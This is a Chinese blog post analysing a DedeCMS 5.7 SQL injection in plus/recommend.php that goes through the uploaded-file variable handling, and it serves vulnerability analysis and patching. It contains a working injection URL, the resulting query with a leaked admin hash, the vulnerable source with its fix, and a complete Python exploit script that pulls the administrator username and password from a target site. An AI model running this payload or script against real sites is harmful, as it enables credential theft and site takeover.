[分析]-DedeCMS全版本通杀SQL注入漏洞

最新推荐文章于 2024-07-22 16:42:40 发布
最新推荐文章于 2024-07-22 16:42:40 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: SQL INJECT 文章标签: sql注入 dedecms php

利用]: http://p2j.cn/?p=798
[补丁]: http://www.dedecms.com/pl/#u20140228_5

---------------------------------------------------------------------------------------------------------------------

网络上公布的原始poc格式如下:

http://127.0.0.1/dedecms5.7/plus/recommend.php?&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111

注入成功,等效于执行下面代码:

[sql]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. mysql> SELECT s.*,t.* FROM   
  2.     -> `dede_member_stow` AS s LEFT JOIN   
  3.     -> `dede_member_stowtype` AS t ON s.type=t.stowname   
  4.     -> WHERE s.aid='1'   
  5.     -> AND s.type='\\' or mid=@`\\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd) from `dede_admin` limit 0,1),5,6,7,8,9#@`\\'` ';  
  6.     -> ;  
  7. +----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+  
  8. | id | mid | aid | title                       | addtime | type | stowname | indexname | indexurl |  
  9. +----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+  
  10. |  1 |   2 |   3 | |admin|f297a57a5a743894a0e4 |       5 | 6    | 7        | 8         | 9        |  
  11. +----+-----+-----+-----------------------------+---------+------+----------+-----------+----------+  
  12. 1 row in set (0.01 sec)  

/*!50000union*/  表示若mysql版本高于5.0.0,则执行union操作.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

下面分析以引起问题的源码,./include/uploadsafe.inc.php


[php]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. <?php  
  2.   
  3. if(!defined('DEDEINC')) exit('Request Error!');  
  4. if(isset($_FILES['GLOBALS'])) exit('Request not allow!');  
  5.   
  6.   
  7. //为了防止用户通过注入的可能性改动了数据库  
  8. //这里强制限定的某些文件类型禁止上传  
  9.   
  10. $cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";  
  11. $keyarr = array('name''type''tmp_name''size');  
  12.   
  13. if ($GLOBALS['cfg_html_editor']=='ckeditor' && isset($_FILES['upload']))  
  14. {  
  15.     $_FILES['imgfile'] = $_FILES['upload'];  
  16.     $CKUpload = TRUE;  
  17.     unset($_FILES['upload']);  
  18. }  
  19.   
  20. foreach($_FILES as $_key=>$_value)  
  21. {  
  22.     foreach($keyarr as $k)  
  23.     {  
  24.         if(!isset($_FILES[$_key][$k]))  
  25.         {  
  26.             exit('Request Error!');  
  27.         }  
  28.     }  
  29.   
  30.     if( preg_match('#^(cfg_|GLOBALS)#'$_key) )  
  31.     {  
  32.         exit('Request var not allow for uploadsafe!');  
  33.     }  
  34.   
  35.     // DedeCMS全版本通杀SQL注入   
  36.     $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);  
  37.     // ----- 修复后, 如下: -----  
  38.     // $$_key = $_FILES[$_key]['tmp_name'];  
  39.     ${$_key.'_name'} = $_FILES[$_key]['name'];  
  40.     ${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i'''$_FILES[$_key]['type']);  
  41.     ${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);  
  42.     if(!empty(${$_key.'_name'}) && (preg_match("#\.(".$cfg_not_allowall.")$#i",${$_key.'_name'}) || !preg_match("#\.#", ${$_key.'_name'})) )  
  43.     {  
  44.         if(!defined('DEDEADMIN'))  
  45.         {  
  46.             exit('Not Admin Upload filetype not allow !');  
  47.         }  
  48.     }  
  49.   
  50.     if(empty(${$_key.'_size'}))  
  51.     {  
  52.         ${$_key.'_size'} = @filesize($$_key);  
  53.     }  
  54.   
  55.   
  56.     $imtypes = array  
  57.     (  
  58.         "image/pjpeg""image/jpeg""image/gif""image/png",   
  59.         "image/xpng""image/wbmp""image/bmp"  
  60.     );  
  61.   
  62.   
  63.     if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))  
  64.     {  
  65.         $image_dd = @getimagesize($$_key);  
  66.         if (!is_array($image_dd))  
  67.         {  
  68.             exit('Upload filetype not allow !');  
  69.         }  
  70.     }  
  71. }  
  72.   
  73. ?>  

$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']); 配合./include/common.inc.php引发问题, 

[php]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. //转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数  
  2. if($_FILES)  
  3. {  
  4.     require_once(DEDEINC.'/uploadsafe.inc.php');  
  5. }  
common.inc.php 定义函数_RunMagicQuotes ,foreach(Array('_GET','_POST','_COOKIE') as $_request) 处_RunMagicQuotes被调用,如下所示

[php]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. function _RunMagicQuotes(&$svar)  
  2. {  
  3.     if(!get_magic_quotes_gpc())  
  4.     {  
  5.         ifis_array($svar) )  
  6.         {  
  7.             foreach($svar as $_k => $_v$svar[$_k] = _RunMagicQuotes($_v);  
  8.         }  
  9.         else  
  10.         {  
  11.             ifstrlen($svar)>0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$svar) )  
  12.             {  
  13.               exit('Request var not allow!');  
  14.             }  
  15.             $svar = addslashes($svar);  
  16.         }  
  17.     }  
  18.     return $svar;  
  19. }  
  20.   
  21.   
  22. if (!defined('DEDEREQUEST'))   
  23. {  
  24.     //检查和注册外部提交的变量   (2011.8.10 修改登录时相关过滤)  
  25.     function CheckRequest(&$val) {  
  26.         if (is_array($val)) {  
  27.             foreach ($val as $_k=>$_v) {  
  28.                 if($_k == 'nvarname'continue;  
  29.                 CheckRequest($_k);   
  30.                 CheckRequest($val[$_k]);  
  31.             }  
  32.         } else  
  33.         {  
  34.             ifstrlen($val)>0 && preg_match('#^(cfg_|GLOBALS|_GET|_POST|_COOKIE)#',$val)  )  
  35.             {  
  36.                 exit('Request var not allow!');  
  37.             }  
  38.         }  
  39.     }  
  40.       
  41.   
  42.     //var_dump($_REQUEST);exit;  
  43.     CheckRequest($_REQUEST);  
  44.     CheckRequest($_COOKIE);  
  45.   
  46.   
  47.     foreach(Array('_GET','_POST','_COOKIE'as $_request)  
  48.     {  
  49.         foreach($$_request as $_k => $_v)   
  50.         {  
  51.             if($_k == 'nvarname') ${$_k} = $_v;  
  52.             else ${$_k} = _RunMagicQuotes($_v);  
  53.         }  
  54.     }  
  55. }  

$_GET, $_POST,$_COOKIE 传入的数据会被 _RunMagicQuotes 检查,_RunMagicQuotes 检查时, 未处理$_FILES,传入带引号的数据 ,引发注入问题.

[php]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);  
  2. // ----- 修复后, 如下: -----  
  3. // $$_key = $_FILES[$_key]['tmp_name'];  
  4. ${$_key.'_name'} = $_FILES[$_key]['name'];  
  5. ${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i'''$_FILES[$_key]['type']);  
  6. ${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);  

需要传入的参数有_FILES[type]['tmpname'], _FILES[type]['name'], _FILES[type]['type'], _FILES[type]['size'], 构造完成后,如上所示.



+++++++++++++++++++++++++++++++++++++++++++++++++++++

python - POC 利用程序如下:

[python]  view plain copy 在CODE上查看代码片 派生到我的代码片
  1. #!/usr/bin/env python  
  2.   
  3. import urllib2  
  4. import re  
  5. import sys  
  6.   
  7. def banner():  
  8.   
  9.     print >>sys.stderr,'\n++++++++++++++++++++++++++++++++++++++++++++++++++++++'  
  10.     print >>sys.stderr,'[POC]  : DedeCMS 5.7 /plus/recommend.php SQL Injection'  
  11.     print >>sys.stderr,'[URL]  : http://sebug.net/vuldb/ssvid-61660'  
  12.     print >>sys.stderr,'[patch]: http://www.dedecms.com/pl/#u20140228_5'  
  13.     print >>sys.stderr,'[Usage]: %s http://path/to/dederoot/' % sys.argv[0]  
  14.     print >>sys.stderr,'++++++++++++++++++++++++++++++++++++++++++++++++++++++'  
  15.   
  16. def sqli_exp(url):  
  17.   
  18.         poc = [  
  19.     "/plus/recommend.php?",  
  20.     "&aid=1",  
  21.     "&_FILES[type][tmp_name]=",  
  22.     "\%27%20%20or%20mid=@%60\%27%60%20",  
  23.     "/*!50000union*//*!50000select*/1,2,3,%28select%20%20CONCAT%280x7c,userid,0x7c,pwd,0x7c%29+from+%60%23@__admin%60%20limit+0,1",  
  24.     "%29,5,6,7,8,9%23@%60\%27%60+",  
  25.     "&_FILES[type][name]=1.jpg",  
  26.     "&_FILES[type][type]=application/octet-stream",  
  27.     "&_FILES[type][size]=111"  
  28.     ]  
  29.     url += "".join(poc)  
  30.     req = urllib2.urlopen(url,data=None, timeout=7)  
  31.     response = req.read()  
  32.     matches = re.search(r'<h2>\xe6\x8e\xa8\xe8\x8d\x90\xef\xbc\x9a|(.*)</h2>', response, re.M|re.I)      
  33.     if ("SRE_Match" in str(type(matches))):  
  34.         data = matches.group().split('|')  
  35.         user = data[1]  
  36.         pwd  = data[2]  
  37.         print "user: %s \npass: %s \n" % (user, pwd)  
  38.   
  39. if __name__ == '__main__':  
  40.   
  41.     banner()  
  42.   
  43.     if len(sys.argv) == 2:  
  44.         print >>sys.stderr,"[+] exploit - %s" % sys.argv[1]   
  45.         sqli_exp(sys.argv[1])  
代码析构师
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【某CMS漏洞SQL注入漏洞分析
HBohan的博客
04-27 1570
前言 这个CMS非常适合入门代码审计的人去学习,因为代码简单且漏洞成因经典,对一些新手有学习价值, 前台注入 从入口开始:/semcms/Templete/default/Include/index.php [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xhTdHBVn-1651041211358)(https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/490ca1b2038f48148c14ac62455278ef~tplv-k
DedeCms v5.7 SQL注入漏洞
网站守护中心
04-13 5387
描述:DedeCms v5.7 SQL注入漏洞WASC Threat Classification 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞形成原因:dedecms v5.7的/member/ajax_membergroup.php脚本对用户提交给“membergroup”参数的数据在用于SQL查询前缺少过滤,
关于sql注入单引号的解决
mochenxue的博客
06-11 612
1. 这边我们采用java的String进行替换为\\",\\ 主要是用于标识这是单引号与前端传来的真正"进行区分,然后写入数据库中。2. 这里我写了一个StringUtil类进行符号的替换和解析。
DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析
热门推荐
CC's Blog
03-05 1万+
DedeCMSrecommend.php文件通杀SQL注入漏洞原理分析 漏洞执行过程 1.首先执行到plus/recommand.php,包含了include/common.inc.php require_once(dirname(__FILE__)."/../include/common.inc.php"); 2来看到include/common.inc.php function _R
织梦dedecms漏洞修复大注入漏洞
unixtech的博客
12-21 3465
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题,今天乐清网站建设的赵老师就为大家讲解一下如何修复任意文件上传漏洞与注入漏洞。任意文件上传漏洞修复包含一个文 DEDECMS|织梦|漏洞修复|
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3803
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
dedesql.class.php 漏洞,織夢dedesql.class.php文件漏洞解決方法
weixin_28972687的博客
03-28 208
阿里雲后台提示織夢dedesql.class.php文件變量覆蓋漏洞會導致SQL注入,可被攻擊者構造惡意SQL語句,重置管理員密碼,寫入webshell等,進而獲取服務器權限。下面告訴大家怎么修復這個漏洞:首先說一下dedecms不安的參數處理機制,這里我們看一下/include/common.inc.php代碼的第106行: 萬惡之源其實就在這里,基本上目前dede被發現的漏洞都死在這里。我...
wLHK-Dedecms漏洞整理.pdf
09-20
从给定的文件信息中,我们可以看到该文件是关于Dedecms漏洞的整理报告,包含了多个漏洞的详情,包括SQL注入漏洞、XSS漏洞等。下面我们将对这些漏洞进行详细的分析和解释。 首先,我们来看第一个漏洞,即Dedecms /...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
利用南方数据企业0day漏洞批量入侵
04-24
利用南方数据企业0day漏洞批量入侵
商业源码-编程源码-DedeCms v5.6 GBK build 20100928.zip
06-15
- 由于是较旧的版本,可能存在已知的安漏洞,使用时需注意定期更新和安维护,防止被黑客攻击。 - 建议升级到最新稳定版,以获得最新的安补丁和功能改进。 6. **社区支持**: - DedeCms拥有活跃的用户社区...
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
DedeCMS 存储型xss漏洞1
08-03
漏洞DedeCMS V5.7 UTF8 SP2 版本中被发现,发布日期为2017年3月15日。当DedeCMS的Shop模块开启时,此漏洞就有可能被利用。 ### 漏洞触发 漏洞的触发点位于 `/dede/shops_delivery.php` 文件中的 `des` 参数。...
织梦Dedecms buy_action.php SQL注入漏洞分析
深秋哋黎明的专栏
11-20 5630
Dedecms buy_action.php SQL注入漏洞分析 0x01 补丁对比 通过对比源码和2月25日补丁发现被改动的文件有三个,buy_action.php、uploadsafe.inc.php和sys_info.htm。 sys_info.htm只是添加了一个重置cfg_cookie_encode的代码,而且是静态文件,可以忽略掉。uploadsafe.inc.php
[Vulfocus解题系列]pbootcms SQL注入 (CVE-2018-16356)
00勇士王子的博客
01-12 7275
简介 PbootCMS是一款使用PHP语言开发的开源企业建站内容管理系统(CMS)。 PbootCMS中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 后台路径:/admin.php 用户名密码:admin:123456 授权码自行获取:https://www.pbootcms.com/freesn/ 靶场搭建 使用在线靶场http://vulfocus.fofa.so 进入环境,发现需要获取授权码 https://www.pboot
CVE-2024-3148 DedeCms makehtml_archives_action sql注入漏洞分析
shelter1234567的博客
04-07 692
DedeCMS(也称为织梦CMS)是一款基于PHP+MySQL的开源内容管理系统。在 DedeCMS 5.7.112 中发现一个被归类为严重的漏洞。此漏洞会影响某些未知文件dede/makehtml_archives_action.php的处理。操作导致 sql 注入。攻击可能是远程发起的。该漏洞已向公众披露并可能被使用。.....官方网站产品下载 / 织梦 (DedeCMS) 官方网站 - 内容管理系统 - 上海卓卓网络科技有限公司。
dedecms织梦支付模块注入漏洞导致SQL注入修复
09-07 404
阿里云提示:织梦dedecms支付模块注入漏洞导致SQL注入修复方法。打开/include/payment/alipay.php文件。
BUUCTF [WUSTCTF2020]朴实无华
最新发布
weixin_73399382的博客
07-22 310
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
dedecms sql注入漏洞
06-28
Dedecms SQL注入漏洞是指在Dedecms系统中存在的一种安漏洞,攻击者可以通过该漏洞向数据库中注入恶意代码,从而实现对网站的攻击和控制。该漏洞主要是由于Dedecms系统中的parse_str函数存在变量覆盖问题,攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值